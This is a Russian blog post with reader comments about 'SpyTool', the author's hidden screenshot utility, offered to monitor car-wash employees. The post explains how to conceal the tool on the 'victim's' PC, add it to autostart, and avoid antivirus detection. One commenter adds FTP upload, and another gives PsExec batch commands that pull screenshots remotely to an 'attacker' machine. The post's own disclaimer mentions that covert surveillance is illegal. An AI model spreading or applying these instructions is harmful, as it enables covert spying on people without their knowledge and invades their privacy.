Недавно ко мне обратился один знакомый, владелец автомойки. Там есть комп, на котором установлена программа учета всей деятельности конторы. Мойка круглосуточная и владелец стал замечать, что временами сотрудники автомойки используют комп не по назначению. Приносят portalble-игрушки, фильмы смотрят и пр. Спрашивает меня — как отследить, чем занимаются сотрудники на компьютере?
Конечно, есть специально разработанные программы для отслеживания действий пользователя на его рабочем месте. Но, во-первых, эти программы стоят денег, а во-вторых, они представляют настолько большой функционал, который не особо нужен, в рамках конкретного вопроса моего знакомого.
Немного пораскинув мозгами, я написал небольшую утилиту, которая в фоновом режиме делает скриншоты экрана с заданным интервалом времени и складывает их в нужную папку. Затем, эти скриншоты можно периодически забирать и анализировать, что происходило на компе в нужный промежуток времени.
Подобных программ мне не жалко, поэтому делюсь со всеми, вдруг кому в хозяйстве пригодится 🙂
Сразу хочу сказать, это первая версия программы и чего-то фантастического в ней нет. Назвал я её SpyTool.
Кратенько перечислю основные особенности:
- Не требует установки
- Не определяется антивирусами как вредоносное ПО
- Создание скриншотов происходит без участия буфера обмена
- Скриншоты сохраняются в JPEG-файлы
- Интервал сохранения скриншотов, величина JPEG-компрессии, каталог сохранения задаются в ini-файле.
- Работает на Windows 2000/XP/Vista/7/8+
Теперь немного подробнее о том, как работает SpyTool.
В архиве вы найдете два файла. Один EXE — это и есть SpyTool. Второй файл с расширением INI — это настройки. Запихиваем оба этих файла на комп жертвы куда-нибудь подальше, например в C:Windows. Имена файлов можно переименовать как вам угодно, главное, чтобы и для EXE и для INI это было одно и тоже имя. Смотрите скриншот ниже:
Далее открываем INI и настраиваем параметры:
- Interval — это интервал создания скриншотов в секундах. Значения могут быть от 5 до 30 включительно.
- Folder — каталог для сохранения скриншотов, если при запуске SpyTool этого каталога не окажется, то утилита попробует сама создать эту папку.
- JPGComression — качество JPEG-файлов. Значения могут быть от 1 до 100 включительно. Чем выше цифра, тем качественнее будет JPEG-файл и тем больше места он будет занимать на жестком диске. На мой взгляд, оптимальным значением является 50, но вы можете поэкспериментировать.
После того, как всё настроили, ярлык на EXE-файл нужно запихнуть куда-нибудь в автозагрузку. Как вы это сделаете, это уже зависит от вашей фантазии. Перезагружаем комп и дело пошло.
INI-файл считывается только один раз при запуске SpyTool, поэтому если вы какие-нибудь параметры измените во время работы, то нужно либо перезагрузить комп либо рестартовать SpyTool: завершить процесс через диспетчер задач и ручками запустить EXE-файл заново.
SpyTool в каталоге назначения создает подкаталоги по дате. Это нужно просто для удобства, если вы не каждый день забираете скриншоты с компа жертвы.
В подкаталогах хранятся сами скриншоты. Названия файлов — это дата + время + специальный символ состояния.
Символ состояния я придумал на будущее. Сейчас он всегда принимает значение N за исключением одного случая. Если пользователь блокирует комп, то делать скриншоты смысла нет, т.к. никакой активности в это время на компьютере не наблюдается. Последний скриншот, перед тем как человек залочил ПК будет идти с символом состояния L. Затем, SpyTool перестает делать скриншоты до тех пор, пока комп не будет разлочен.
И еще парочка особенностей, которые неплохо знать. Во-первых, если к компьютеру подключено несколько мониторов, то SpyTool пока умеет делать скриншоты только с основного монитора. Во-вторых, скриншоты делаются до тех пор, пока место на диске не кончится, т.е. SpyTool пока не умеет самостоятельно следить за свободным местом и при необходимости удалять старые скриншоты.
Скачать последнюю версию SpyTool можно по этой ссылке
Если утилита SpyTool показалась вам интересной и вас есть идеи и предложения по улучшению этой софтины, то оставляйте ваши комментарии или пишите мне на почту macrodmin[собака]gmail.com. В теме письма, пожалуйста, пишите SpyTool.
И последнее! Несанкционированная слежка за кем-либо у нас запрещена законом, поэтому если вы используете утилиту SpyTool, то вы это делаете на свой страх и риск. Имейте это ввиду!
Удачи! 😉
7 комментариев к “SpyTool — следим за пользователями”
Ulukmyrza - 9 апреля, 2015
Здравствуйте ! У меня такой вопрос: Если он или она сидит совсем в другом здании и у тебя нету доступа входит туда, там где он или она сидит. Как я заберу скриншот ? Или есть возможность забрать входя соц сеть ???
alexmdv - 12 апреля, 2015
Забрать можно только если у вас есть удаленный или физический доступ к этому ПК.
Андрей Николаевич - 31 июля, 2015
Полезная программка, развивайте её.
1. По поводу законности: достаточно предупредить сотрудника о том, что на работе в рабочее время за его работой ведется контроль, т.е. как в общественных местах — предупреждения о работе видеонаблюдения.
2. Хорошо бы, чтобы второй монитор тоже скринился.
3. Интервал скринов полезно увеличить — до 1 раз в 5-10 мин., как минимум.
sergey - 28 октября, 2015
Да весьма полезная тулза, спасибо
Александр - 9 марта, 2016
Используем тайм вивер, можно все контролировать он-лайн )))
Юрий - 27 мая, 2016
Утилита огонь. Пришлось много допиливать чтобы организовать заливку генерируемых изображений на фтп. Хотелось бы чтобы утилита считывала с ini файла переменные среды (например %LOCALAPPDATA% для пути сохранения).
NoName - 13 февраля, 2017
Зачем все так усложнять?
Способ палевный. Ниже способ как забирать скриншот удаленно, при этом никаких файлов на компьютере жертвы не накапливается:
Используем PsExec и любую утилиту снятия скриншота из командной строки (например boxcutter-fs)
запускаем из батника с компьютера атакующего:
1. создание скриншота — psexec \%IP% -u %ADMNAME% -p %PAS% -i -c boxcutter-fs c:windows%Filename%.png
2. переносим с компа жертвы скриншот
move /Y \%IP%Admin$%Filename%.png \%DESTIP%e$%IP%
3. задержка на необходимое время между скриншотами — ping -n 1 -w 60000 «Свой IP-адрес» >nul